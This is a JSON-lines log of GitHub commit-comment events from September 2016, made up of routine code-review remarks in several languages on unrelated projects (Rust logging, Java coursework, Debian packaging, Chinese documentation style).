{"id":"4641197920","type":"CommitCommentEvent","actor":{"login":"dpc"},"repo":{"name":"whipsch/slog-rs"},"payload":{"comment":{"id":19235701,"position":11,"line":97,"path":"crates/syslog/lib.rs","commit_id":"dcd14f71b5811c3106d085ad8e862e9138339dfc","created_at":"2016-09-30T03:01:40Z","updated_at":"2016-09-30T03:01:40Z","body":"In case this `try!` returns early the `buf.clear()` will not get called. In other crates I'm using a following pattern:\r\n\r\nhttps://github.com/dpc/slog-rs/blob/master/crates/stream/lib.rs#L57\r\n\r\nto make sure buffer gets cleared at all times. I'm not sure if in this case it make any difference, since after first failure to write, following ones will fail too, but you might consider it.\r\n"}},"created_at":"2016-09-30T03:01:40Z"}
{"id":"4641198935","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19235702,"position":8,"line":2064,"path":"commands.js","commit_id":"810d1e5f23b206719f4e6b2288dacf698b194438","created_at":"2016-09-30T03:02:04Z","updated_at":"2016-09-30T03:02:04Z","body":"I don't know anywhere else we use 'person' when referring to a 'user'"}},"created_at":"2016-09-30T03:02:04Z"}
{"id":"4641199125","type":"CommitCommentEvent","actor":{"login":"dpc"},"repo":{"name":"whipsch/slog-rs"},"payload":{"comment":{"id":19235703,"position":null,"line":null,"path":null,"commit_id":"dcd14f71b5811c3106d085ad8e862e9138339dfc","created_at":"2016-09-30T03:02:08Z","updated_at":"2016-09-30T03:02:08Z","body":"One comment to consider. Good catch."}},"created_at":"2016-09-30T03:02:08Z"}
{"id":"4641199865","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19235704,"position":10,"line":23,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"72b6db170f204a34b1a7a0e7208309f828b8bd4d","created_at":"2016-09-30T03:02:25Z","updated_at":"2016-09-30T03:02:25Z","body":"cuidado.. essa indentação tá bem perigosa para o entendimento do código."}},"created_at":"2016-09-30T03:02:25Z"}
{"id":"4641200006","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine-core"},"payload":{"comment":{"id":19235705,"position":null,"line":null,"path":null,"commit_id":"bae9632229e07d886e35642e84291fcf3efb0b0a","created_at":"2016-09-30T03:02:28Z","updated_at":"2016-09-30T03:02:28Z","body":"writing the test cases revealed a flaw in the initial implementation of `meta:eci`\r\n\r\nit had worked in the context of an event, but not if invoked in the context of a query"}},"created_at":"2016-09-30T03:02:28Z"}
{"id":"4641200785","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19235707,"position":9,"line":22,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"72b6db170f204a34b1a7a0e7208309f828b8bd4d","created_at":"2016-09-30T03:02:47Z","updated_at":"2016-09-30T03:02:47Z","body":"preste atenção no resultado que esse código vai produzir.. olhe o enunciado do exercício."}},"created_at":"2016-09-30T03:02:47Z"}
{"id":"4641203391","type":"CommitCommentEvent","actor":{"login":"zzl1991"},"repo":{"name":"sentsin/layer"},"payload":{"comment":{"id":19235713,"position":null,"line":null,"path":null,"commit_id":"8b72a52edecb78f5ffb31ef3a97325bd9ba948ad","created_at":"2016-09-30T03:03:48Z","updated_at":"2016-09-30T03:03:48Z","body":"怎么content不能dom获取"}},"created_at":"2016-09-30T03:03:48Z"}
{"id":"4641207314","type":"CommitCommentEvent","actor":{"login":"macedir"},"repo":{"name":"macedir/School"},"payload":{"comment":{"id":19235721,"position":null,"line":null,"path":null,"commit_id":"563402c50170567e68026e46f2ed85682d158350","created_at":"2016-09-30T03:05:20Z","updated_at":"2016-09-30T03:05:20Z","body":"also commented out the account debug output"}},"created_at":"2016-09-30T03:05:20Z"}
{"id":"4641208020","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19235722,"position":11,"line":93,"path":"src/modulo-01-java-OO/modulo-01/InventarioTest.java","commit_id":"72b6db170f204a34b1a7a0e7208309f828b8bd4d","created_at":"2016-09-30T03:05:36Z","updated_at":"2016-09-30T03:05:36Z","body":"esse teste tá passando?"}},"created_at":"2016-09-30T03:05:36Z"}
{"id":"4641208829","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"oe-alliance/oe-alliance-settings"},"payload":{"comment":{"id":19235724,"position":null,"line":null,"path":null,"commit_id":"a6943ddfd7a2fc1f31bdce5c228d302936deeb27","created_at":"2016-09-30T03:05:54Z","updated_at":"2016-09-30T03:05:54Z","body":"Good point: I'll delete all VHannibal's settings. That saves me a lot of work, and through that plugin everybody can have updated settings."}},"created_at":"2016-09-30T03:05:54Z"}
{"id":"4641209154","type":"CommitCommentEvent","actor":{"login":"Judicy"},"repo":{"name":"Judicy/expert-system"},"payload":{"comment":{"id":19235725,"position":null,"line":null,"path":null,"commit_id":"7328006a101491fda91f08d55c6f5eade9f4398d","created_at":"2016-09-30T03:06:00Z","updated_at":"2016-09-30T03:06:00Z","body":"hello world"}},"created_at":"2016-09-30T03:06:00Z"}
{"id":"4641209814","type":"CommitCommentEvent","actor":{"login":"Harshilkorani"},"repo":{"name":"Harshilkorani/BigData"},"payload":{"comment":{"id":19235727,"position":null,"line":null,"path":null,"commit_id":"6fe85ff4b6d71dfa0a0f59cdb4bdfee761cf67e9","created_at":"2016-09-30T03:06:16Z","updated_at":"2016-09-30T03:06:16Z","body":"\r\nBig data Stock market project\r\n\r\n\r\n[outputClusters.txt](https://github.com/Harshilkorani/BigData/files/502089/outputClusters.txt)\r\n\r\n\r\n"}},"created_at":"2016-09-30T03:06:16Z"}
{"id":"4641211528","type":"CommitCommentEvent","actor":{"login":"jadonk"},"repo":{"name":"jadonk/Robotics_Cape_Installer"},"payload":{"comment":{"id":19235729,"position":7,"line":8,"path":"install_files/robot.service","commit_id":"c9b14d794d6770194025fd363cde9f38b5506007","created_at":"2016-09-30T03:06:56Z","updated_at":"2016-09-30T03:06:56Z","body":"Technically, this should probably be in /var/lib or /var/run, not in /etc by the best of my understanding. I think /etc/ is more for textual configuration files and not stuff with a lot of dynamic changes."}},"created_at":"2016-09-30T03:06:56Z"}
{"id":"4641212055","type":"CommitCommentEvent","actor":{"login":"kerrande"},"repo":{"name":"HideYoWhiskey/Algorithms"},"payload":{"comment":{"id":19235731,"position":null,"line":null,"path":null,"commit_id":"88f4f942f728286cc532cf7fccecab5df9f10405","created_at":"2016-09-30T03:07:09Z","updated_at":"2016-09-30T03:07:09Z","body":"Nice stuff that is actually useful. Try some of these: http://users.ece.utexas.edu/~adnan/afi-samples.pdf"}},"created_at":"2016-09-30T03:07:09Z"}
{"id":"4641214639","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"regismartiny/crescer-2016-2"},"payload":{"comment":{"id":19235735,"position":19,"line":19,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"118e4fd1c11a6ef7584f2b9254673e50a3c1d31c","created_at":"2016-09-30T03:08:09Z","updated_at":"2016-09-30T03:08:09Z","body":"cliente não pediu isto. para fazer os testes crie um método que retorne o ArrayList<Item> e teste a partir disso."}},"created_at":"2016-09-30T03:08:09Z"}
{"id":"4641215164","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19235738,"position":null,"line":null,"path":null,"commit_id":"2049aea49dfba35371a15865ac2a09281883f38b","created_at":"2016-09-30T03:08:21Z","updated_at":"2016-09-30T03:08:21Z","body":"yes!\r\nI compiled yesterday and still testing.\r\nOnly one time SODS when I remount my external sdcard(fat32).\r\nno pstore messages.\r\n"}},"created_at":"2016-09-30T03:08:21Z"}
{"id":"4641215618","type":"CommitCommentEvent","actor":{"login":"bumbadadabum"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19235739,"position":8,"line":2064,"path":"commands.js","commit_id":"810d1e5f23b206719f4e6b2288dacf698b194438","created_at":"2016-09-30T03:08:32Z","updated_at":"2016-09-30T03:08:32Z","body":"Yeah fair point my bad it's late."}},"created_at":"2016-09-30T03:08:32Z"}
{"id":"4641215869","type":"CommitCommentEvent","actor":{"login":"jadonk"},"repo":{"name":"jadonk/Robotics_Cape_Installer"},"payload":{"comment":{"id":19235740,"position":12,"line":12,"path":"install_files/robotics.mk","commit_id":"c9b14d794d6770194025fd363cde9f38b5506007","created_at":"2016-09-30T03:08:39Z","updated_at":"2016-09-30T03:08:39Z","body":"This needs to be $(DESTDIR)$(prefix)/bin to support simple building with Debian packaging tools. You'd also need \"prefix := /usr\", so it'd end up in the same place. DESTDIR is used for the packaging and gets stripped back to root on install."}},"created_at":"2016-09-30T03:08:39Z"}
{"id":"4641216591","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"regismartiny/crescer-2016-2"},"payload":{"comment":{"id":19235742,"position":12,"line":29,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"efb23b0157b021011db34f9ea981687f5d1531db","created_at":"2016-09-30T03:08:57Z","updated_at":"2016-09-30T03:08:57Z","body":"Opa, retira esse System.out.println. O código final não pode ter isso."}},"created_at":"2016-09-30T03:08:57Z"}
{"id":"4641217727","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"regismartiny/crescer-2016-2"},"payload":{"comment":{"id":19235746,"position":7,"line":24,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"efb23b0157b021011db34f9ea981687f5d1531db","created_at":"2016-09-30T03:09:27Z","updated_at":"2016-09-30T03:09:27Z","body":"print está inglês. O código deve ser no português ou inglês, não nos dois."}},"created_at":"2016-09-30T03:09:27Z"}
{"id":"4641217916","type":"CommitCommentEvent","actor":{"login":"LunaLuan"},"repo":{"name":"LunaLuan/MuaChungApp"},"payload":{"comment":{"id":19235747,"position":null,"line":null,"path":null,"commit_id":"dfc98359b95f14cd5dad91c5b21a38b7e4d9f58a","created_at":"2016-09-30T03:09:32Z","updated_at":"2016-09-30T03:09:32Z","body":"Không biết được chưa"}},"created_at":"2016-09-30T03:09:32Z"}
{"id":"4641218881","type":"CommitCommentEvent","actor":{"login":"cassiofariasmachado"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19235748,"position":11,"line":93,"path":"src/modulo-01-java-OO/modulo-01/InventarioTest.java","commit_id":"72b6db170f204a34b1a7a0e7208309f828b8bd4d","created_at":"2016-09-30T03:09:59Z","updated_at":"2016-09-30T03:09:59Z","body":"Sim, está."}},"created_at":"2016-09-30T03:09:59Z"}
{"id":"4641219049","type":"CommitCommentEvent","actor":{"login":"jadonk"},"repo":{"name":"jadonk/Robotics_Cape_Installer"},"payload":{"comment":{"id":19235749,"position":1,"line":1,"path":"battery_monitor_service/Makefile","commit_id":"c9b14d794d6770194025fd363cde9f38b5506007","created_at":"2016-09-30T03:10:02Z","updated_at":"2016-09-30T03:10:02Z","body":"Using an include would save a lot of redundant fixes."}},"created_at":"2016-09-30T03:10:02Z"}
{"id":"4641223473","type":"CommitCommentEvent","actor":{"login":"jadonk"},"repo":{"name":"jadonk/Robotics_Cape_Installer"},"payload":{"comment":{"id":19235755,"position":5,"line":5,"path":"examples/balance/Makefile","commit_id":"c9b14d794d6770194025fd363cde9f38b5506007","created_at":"2016-09-30T03:11:47Z","updated_at":"2016-09-30T03:11:47Z","body":"Relying on this to be installed won't work for Debian packaging. Everything needs to build and install in a subdirectory with a simple 'make && DESTDIR=/tmp/x make install'"}},"created_at":"2016-09-30T03:11:47Z"}
{"id":"4641224008","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19235756,"position":28,"line":27,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"ceda95fdd680d9f946af00fb83ef9cdc73c3b34d","created_at":"2016-09-30T03:11:59Z","updated_at":"2016-09-30T03:11:59Z","body":"tente melhorar esta lógica de não incluir a vírgula para o último."}},"created_at":"2016-09-30T03:11:59Z"}
{"id":"4641225195","type":"CommitCommentEvent","actor":{"login":"hjubb"},"repo":{"name":"byronmejia/CodingGame"},"payload":{"comment":{"id":19235758,"position":null,"line":null,"path":null,"commit_id":"f46be3c02235084b70ff19e666fb16669778df93","created_at":"2016-09-30T03:12:27Z","updated_at":"2016-09-30T03:12:27Z","body":"~~how to cheat pls~~"}},"created_at":"2016-09-30T03:12:27Z"}
{"id":"4641230970","type":"CommitCommentEvent","actor":{"login":"cassiofariasmachado"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19235766,"position":10,"line":23,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"72b6db170f204a34b1a7a0e7208309f828b8bd4d","created_at":"2016-09-30T03:14:50Z","updated_at":"2016-09-30T03:14:50Z","body":"Ok, irei corrigir a indentação, geralmente cuido bastante disso principalmente com ifs, mas me passei nesse caso."}},"created_at":"2016-09-30T03:14:50Z"}
{"id":"4641231818","type":"CommitCommentEvent","actor":{"login":"zhw2101024"},"repo":{"name":"metalwood/libsg"},"payload":{"comment":{"id":19235767,"position":null,"line":null,"path":null,"commit_id":"d2ac3a6bb31b5ff4d1f93e41f3345c1988881355","created_at":"2016-09-30T03:15:11Z","updated_at":"2016-09-30T03:15:11Z","body":"add script to build ffmpeg on Mac"}},"created_at":"2016-09-30T03:15:11Z"}
{"id":"4641235312","type":"CommitCommentEvent","actor":{"login":"safwank"},"repo":{"name":"safwank/toniq"},"payload":{"comment":{"id":19235770,"position":null,"line":null,"path":null,"commit_id":"c09a51f7a47d9a695d23aafde70eeb818d2f2173","created_at":"2016-09-30T03:16:38Z","updated_at":"2016-09-30T03:16:38Z","body":"@joakimk Let me know what you think of what I've come up with so far.\r\n\r\nAlso I'm thinking of making the period between \"flushes\" configurable. It's now hard-coded to 100ms."}},"created_at":"2016-09-30T03:16:38Z"}
{"id":"4641237369","type":"CommitCommentEvent","actor":{"login":"waidyanatha"},"repo":{"name":"sahana/SAMBRO"},"payload":{"comment":{"id":19235773,"position":4,"line":554,"path":"modules/s3db/msg.py","commit_id":"ef7383f2446e3a1d57554df1cd58115c97968352","created_at":"2016-09-30T03:17:31Z","updated_at":"2016-09-30T03:17:31Z","body":"Once the attachment is emailed there is no need to provide any reference to\na file. If the user wants they can go fetch from web by using API with .cap\nfile extension.\n\nOn Sep 30, 2016 08:11, \"Fran Boon\" <notifications@github.com> wrote:\n\n> If we link to document_id, I don't think we need an additional file_path\n> here?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sahana/SAMBRO/commit/ef7383f2446e3a1d57554df1cd58115c97968352#commitcomment-19235579>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAhMx86gYx2gBMgf2RojNyH8OytpKqNaks5qvHbsgaJpZM4KKqjS>\n> .\n>\n"}},"created_at":"2016-09-30T03:17:31Z"}
{"id":"4641238965","type":"CommitCommentEvent","actor":{"login":"cassiofariasmachado"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19235775,"position":9,"line":22,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"72b6db170f204a34b1a7a0e7208309f828b8bd4d","created_at":"2016-09-30T03:18:13Z","updated_at":"2016-09-30T03:18:13Z","body":"A princípio está passando nos testes esse algoritmo, qual seria o problema dele?"}},"created_at":"2016-09-30T03:18:13Z"}
{"id":"4641240485","type":"CommitCommentEvent","actor":{"login":"LarryAsante"},"repo":{"name":"GrinnellAppDev/Lyles-Android"},"payload":{"comment":{"id":19235776,"position":28,"line":33,"path":"app/src/main/java/grinnell/appdev/edu/lyles/fragments/MenuFragment.java","commit_id":"d60ee7a661bb471c375a8c00cde122cda9fffafa","created_at":"2016-09-30T03:18:53Z","updated_at":"2016-09-30T03:18:53Z","body":"Please extract the string into the strings.xml file and reference it using `Context#getResoureces().getString(R.string.[string item name])`"}},"created_at":"2016-09-30T03:18:53Z"}
{"id":"4641247498","type":"CommitCommentEvent","actor":{"login":"Disbe"},"repo":{"name":"greatelv/canon"},"payload":{"comment":{"id":19235782,"position":1,"line":1,"path":"be/BackCanonProject/WebContent/index.html","commit_id":"6b89198082c648d20174381695d22017fa1ceea8","created_at":"2016-09-30T03:21:48Z","updated_at":"2016-09-30T03:21:48Z","body":"개인적으로 테스트로 돌아가는지 확인해볼 때 404 뜨는게 싫어 하나만 뒀는데 제거하겠습니다."}},"created_at":"2016-09-30T03:21:48Z"}
{"id":"4641250336","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19235784,"position":15,"line":15,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T03:23:01Z","updated_at":"2016-09-30T03:23:01Z","body":"这里有个取反的操作～  当desc.indexOf(':') 为0时，~desc.indexOf(':') 为-1，则会走前面的逻辑 ; 当desc.indexOf(':') 为-1时，~desc.indexOf(':')为0，会走后面的逻辑。。。 ps: 取反的操作很少人用，应该避免使用这种方法的～"}},"created_at":"2016-09-30T03:23:01Z"}
{"id":"4641253725","type":"CommitCommentEvent","actor":{"login":"kerrande"},"repo":{"name":"HideYoWhiskey/Algorithms"},"payload":{"comment":{"id":19235791,"position":null,"line":null,"path":null,"commit_id":"88f4f942f728286cc532cf7fccecab5df9f10405","created_at":"2016-09-30T03:24:32Z","updated_at":"2016-09-30T03:24:32Z","body":"Wait, but what about negatives, you scrub\r\n"}},"created_at":"2016-09-30T03:24:32Z"}
{"id":"4641254107","type":"CommitCommentEvent","actor":{"login":"WHATISFANTASY"},"repo":{"name":"WHATISFANTASY/morra_repo"},"payload":{"comment":{"id":19235792,"position":2,"line":2,"path":"3.txt","commit_id":"b38778e070950457233f9c8a300e86c9c06dadf3","created_at":"2016-09-30T03:24:41Z","updated_at":"2016-09-30T03:24:41Z","body":"qw"}},"created_at":"2016-09-30T03:24:41Z"}
{"id":"4641254792","type":"CommitCommentEvent","actor":{"login":"vickiizhang"},"repo":{"name":"tencentyun/qcloud-documents"},"payload":{"comment":{"id":19235793,"position":null,"line":null,"path":null,"commit_id":"0543edf6161ba6f69eb11e06733a3493b0c6657e","created_at":"2016-09-30T03:25:00Z","updated_at":"2016-09-30T03:25:00Z","body":"1. 简介文档存在缺少句末标点的情况，请检查。\r\n2. 接口鉴权文档，点击后的文字请不要使用【xx】形式表达，请改为加粗文字的方式，请调整。\r\n3. 错误码，文中有错误使用标点的情况，例如，并列情况请使用顿号而非逗号，有些逗号误用为英文标点且其后多了空格，另外中英文内容之间仍然缺了空格，请修正。"}},"created_at":"2016-09-30T03:25:00Z"}
{"id":"4641257952","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19235795,"position":null,"line":null,"path":null,"commit_id":"b12826009c88fcc6708369ba90f9fe9eebcabc47","created_at":"2016-09-30T03:26:20Z","updated_at":"2016-09-30T03:26:20Z","body":"@MichaelWallace30 \r\nCommsLink is really sloppy... It can't be used by clients outside. However, everything works."}},"created_at":"2016-09-30T03:26:20Z"}
{"id":"4641260076","type":"CommitCommentEvent","actor":{"login":"bramadevu45"},"repo":{"name":"bramadevu45/Computer-Science-Website-with-MVC-Framework-"},"payload":{"comment":{"id":19235797,"position":null,"line":null,"path":null,"commit_id":"6596935bfbb1a26c12577c4beafa8e5290d23d59","created_at":"2016-09-30T03:27:16Z","updated_at":"2016-09-30T03:27:16Z","body":"As a student I want to \r\n 1. view professors’ and TAs’ office hours\r\n 2. send e-mails to professors and TAs\r\n 3. view information of courses offered in the current semester, including the names of the instructor and TA, their office hours, office locations, and the course syllabus\r\n 4. view and apply to the posted off-campus and on-campus job opportunities \r\n 5. view program requirements and check my status\r\n 6. view a list of courses suggested for each concentration\r\n 7. sign up for the departmental exams\r\n 8. view my result of the exam \r\n \r\nAs a faculty member I want to\r\n 1. post my office hours, TAs and course syllabus for each course I am teaching  \r\n \r\nAs a faculty/staff I want to \r\n 1. reserve available resources (conference room, projector, etc.)\r\n 2. cancel my reservation\r\n 3. announce job opportunities, events, and news\r\n 4. delete announcement\r\n 5. delete inappropriate content of posting \r\n 6. post/edit the results of the departmental exams\r\n 7. view the results of the departmental exams\r\n 8. view, post and update Ph.D. students’ status \r\n \r\n \r\nAs a student/faculty/staff I want to \r\n 1. Log in to and log out from the system \r\n2. post questions or reply to questions on the discussion board \r\n3. view, post, and edit alumni info "}},"created_at":"2016-09-30T03:27:16Z"}
{"id":"4641260459","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19235798,"position":19,"line":19,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T03:27:25Z","updated_at":"2016-09-30T03:27:25Z","body":"这里是优惠券的金额显示，暂不支持显示小数，后端返回的时候也是整型，为确保是整型加了这层逻辑。"}},"created_at":"2016-09-30T03:27:25Z"}
{"id":"4641263446","type":"CommitCommentEvent","actor":{"login":"mjhanselman"},"repo":{"name":"mjhanselman/forever-service"},"payload":{"comment":{"id":19235805,"position":null,"line":null,"path":null,"commit_id":"77887e122f4dc60ea55f018a456f1acceb07776f","created_at":"2016-09-30T03:28:43Z","updated_at":"2016-09-30T03:28:43Z","body":"Node.js 6.7.0 throws an error on dirname() when 'forever' isn't in the PATH. Simply swallowing the error via a plain try/catch preserves the rest of the existing logic; i.e. handling the --foreverPath option after the fact\r\n\r\nWithout this commit, I receive this output when forever isn't in my PATH but I still try to use --foreverPath:\r\n\r\nforever-service version 0.5.8\r\n\r\nPlatform - CentOS release 6.7 (Final)\r\n\r\nforeverpath not found\r\npath.js:7\r\n    throw new TypeError('Path must be a string. Received ' + inspect(path));\r\n    ^\r\n\r\nTypeError: Path must be a string. Received undefined\r\n    at assertPath (path.js:7:11)\r\n    at Object.dirname (path.js:1326:5)\r\n    at Command.<anonymous> (/opt/aos/aos-ui-api/node_modules/forever-service/bin/forever-service:88:34)\r\n    at Command.listener (/opt/aos/aos-ui-api/node_modules/commander/index.js:249:8)\r\n    at emitTwo (events.js:106:13)\r\n    at Command.emit (events.js:191:7)\r\n    at Command.parseArgs (/opt/aos/aos-ui-api/node_modules/commander/index.js:480:12)\r\n    at Command.parse (/opt/aos/aos-ui-api/node_modules/commander/index.js:372:21)\r\n    at /opt/aos/aos-ui-api/node_modules/forever-service/bin/forever-service:174:23\r\n    at Walker.<anonymous> (/opt/aos/aos-ui-api/node_modules/forever-service/lib/platforms.js:28:3)\r\n"}},"created_at":"2016-09-30T03:28:43Z"}
{"id":"4641264593","type":"CommitCommentEvent","actor":{"login":"LarryAsante"},"repo":{"name":"GrinnellAppDev/Lyles-Android"},"payload":{"comment":{"id":19235811,"position":29,"line":34,"path":"app/src/main/java/grinnell/appdev/edu/lyles/fragments/MenuFragment.java","commit_id":"d60ee7a661bb471c375a8c00cde122cda9fffafa","created_at":"2016-09-30T03:29:14Z","updated_at":"2016-09-30T03:29:14Z","body":"cc: @PsychicNoodles @murphymatt \r\nLet's also extract the integers here into constants. They currently look like magic numbers with no clear meaning. eg. `public static int HOT_FOOD_TAB_VALUE = 1` and similar for the other integers."}},"created_at":"2016-09-30T03:29:14Z"}
{"id":"4641264651","type":"CommitCommentEvent","actor":{"login":"SethBorder"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19235812,"position":25,"line":25,"path":"dbTest/dbDisp.php","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T03:29:16Z","updated_at":"2016-09-30T03:29:16Z","body":"I'm not sure what $rsp stands for. I'm assuming response? Anyway, just as an FYI, common convention is to use whole words for variables unless it's a commonly agreed upon abbreviation (or special cases, like using i for a counter).\r\nHope you don't mind the comments as I go through the code, I've just sorta gotten in the habit since doing lots of Code Reviews at work, and thought you might appreciate seeing my thoughts, regardless of if you decide to implement any ideas I bring up."}},"created_at":"2016-09-30T03:29:16Z"}
{"id":"4641266422","type":"CommitCommentEvent","actor":{"login":"LarryAsante"},"repo":{"name":"GrinnellAppDev/Lyles-Android"},"payload":{"comment":{"id":19235816,"position":41,"line":47,"path":"app/src/main/java/grinnell/appdev/edu/lyles/fragments/MenuFragment.java","commit_id":"d60ee7a661bb471c375a8c00cde122cda9fffafa","created_at":"2016-09-30T03:30:00Z","updated_at":"2016-09-30T03:30:00Z","body":"Change this to final. The value of the Bundle won't change anymore. `final Bundle bundle = new Bundle()`"}},"created_at":"2016-09-30T03:30:00Z"}
{"id":"4641266788","type":"CommitCommentEvent","actor":{"login":"danny-su"},"repo":{"name":"Komodo/komodo-go"},"payload":{"comment":{"id":19235817,"position":null,"line":null,"path":null,"commit_id":"14282c20d7b8c5e33c89d90c716665d15bcac346","created_at":"2016-09-30T03:30:07Z","updated_at":"2016-09-30T03:30:07Z","body":"It seems that the fix doesn't work on windows, because %(go)fmt may be resolved to \"xxx\\go.exefmt\"."}},"created_at":"2016-09-30T03:30:07Z"}
{"id":"4641269070","type":"CommitCommentEvent","actor":{"login":"shineky"},"repo":{"name":"shineky/sky.github.io"},"payload":{"comment":{"id":19235824,"position":null,"line":null,"path":null,"commit_id":"659c3584173bc814527619744c22083b61de4a1e","created_at":"2016-09-30T03:31:01Z","updated_at":"2016-09-30T03:31:01Z","body":"[Uploading index.html…]()\r\n"}},"created_at":"2016-09-30T03:31:01Z"}
{"id":"4641270924","type":"CommitCommentEvent","actor":{"login":"DrDrei"},"repo":{"name":"DrDrei/CMPUT301F16T02"},"payload":{"comment":{"id":19235826,"position":null,"line":null,"path":null,"commit_id":"f5d5d73164afc2a80ce86abc47dfd531cbd7a93c","created_at":"2016-09-30T03:31:47Z","updated_at":"2016-09-30T03:31:47Z","body":"O hai tanx"}},"created_at":"2016-09-30T03:31:47Z"}
{"id":"4641271151","type":"CommitCommentEvent","actor":{"login":"vickiizhang"},"repo":{"name":"tencentyun/qcloud-documents"},"payload":{"comment":{"id":19235827,"position":null,"line":null,"path":null,"commit_id":"2816e3cdcd7c4ef84942015e3108ab611c0d0e63","created_at":"2016-09-30T03:31:53Z","updated_at":"2016-09-30T03:31:53Z","body":"1. 中英文内容中间请加空格，请全文检查\r\n2. 删去文中多余文字；表格中只有此处用了句尾标点，请保持一致\r\n![image](https://cloud.githubusercontent.com/assets/20946938/18979861/40a1649e-8701-11e6-8c6c-f8741f919385.png)\r\n3. 其间请使用中文分号\r\n![image](https://cloud.githubusercontent.com/assets/20946938/18979873/5df5869c-8701-11e6-8507-31359599bc0f.png)\r\n4. 此条有多处错误使用了英文标点，请修正\r\n![image](https://cloud.githubusercontent.com/assets/20946938/18979886/7158eea4-8701-11e6-88ba-4197fdd2425d.png)\r\n"}},"created_at":"2016-09-30T03:31:53Z"}
{"id":"4641271474","type":"CommitCommentEvent","actor":{"login":"SethBorder"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19235828,"position":36,"line":36,"path":"dbTest/dbDisp.php","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T03:32:00Z","updated_at":"2016-09-30T03:32:00Z","body":"Is there a reason you want to have one .php file handle both forms? Programmatically, adding another file is pretty cheap, whereas the overhead of keeping track mentally of complicated code can spiral out of control fast."}},"created_at":"2016-09-30T03:32:00Z"}
{"id":"4641273697","type":"CommitCommentEvent","actor":{"login":"vlakoff"},"repo":{"name":"kasper93/mpc-hc"},"payload":{"comment":{"id":19235830,"position":16,"line":3963,"path":"src/mpc-hc/mpcresources/PO/mpc-hc.fr.strings.po","commit_id":"b8ed932ce2b2e64f1c9dd032423da9e33a25e87d","created_at":"2016-09-30T03:32:50Z","updated_at":"2016-09-30T03:32:50Z","body":"Should be \"vectorisée.\""}},"created_at":"2016-09-30T03:32:50Z"}
{"id":"4641274726","type":"CommitCommentEvent","actor":{"login":"vickiizhang"},"repo":{"name":"tencentyun/qcloud-documents"},"payload":{"comment":{"id":19235833,"position":null,"line":null,"path":null,"commit_id":"28e86247f4d853ceddb7b155b823ca8036e3c438","created_at":"2016-09-30T03:33:15Z","updated_at":"2016-09-30T03:33:15Z","body":"新增内容请注意以下两点：\r\n1. 中英文内容中间请加空格\r\n2. 错用英文标点，请修正\r\n![image](https://cloud.githubusercontent.com/assets/20946938/18979918/abda19b8-8701-11e6-82d3-3c791cbaf809.png)\r\n"}},"created_at":"2016-09-30T03:33:15Z"}
{"id":"4641274863","type":"CommitCommentEvent","actor":{"login":"jlhall"},"repo":{"name":"jlhall/D3Rand_Builder"},"payload":{"comment":{"id":19235834,"position":null,"line":null,"path":null,"commit_id":"57730d07b276c2ca217c4f2b04eff62bd82508b3","created_at":"2016-09-30T03:33:19Z","updated_at":"2016-09-30T03:33:19Z","body":"May re-implement as separate component; but this strikes the question of whether a parent component could be extracted in general, creating <Build/> which takes props specifying the class; and thereby avoiding the redundancy currently in the project."}},"created_at":"2016-09-30T03:33:19Z"}
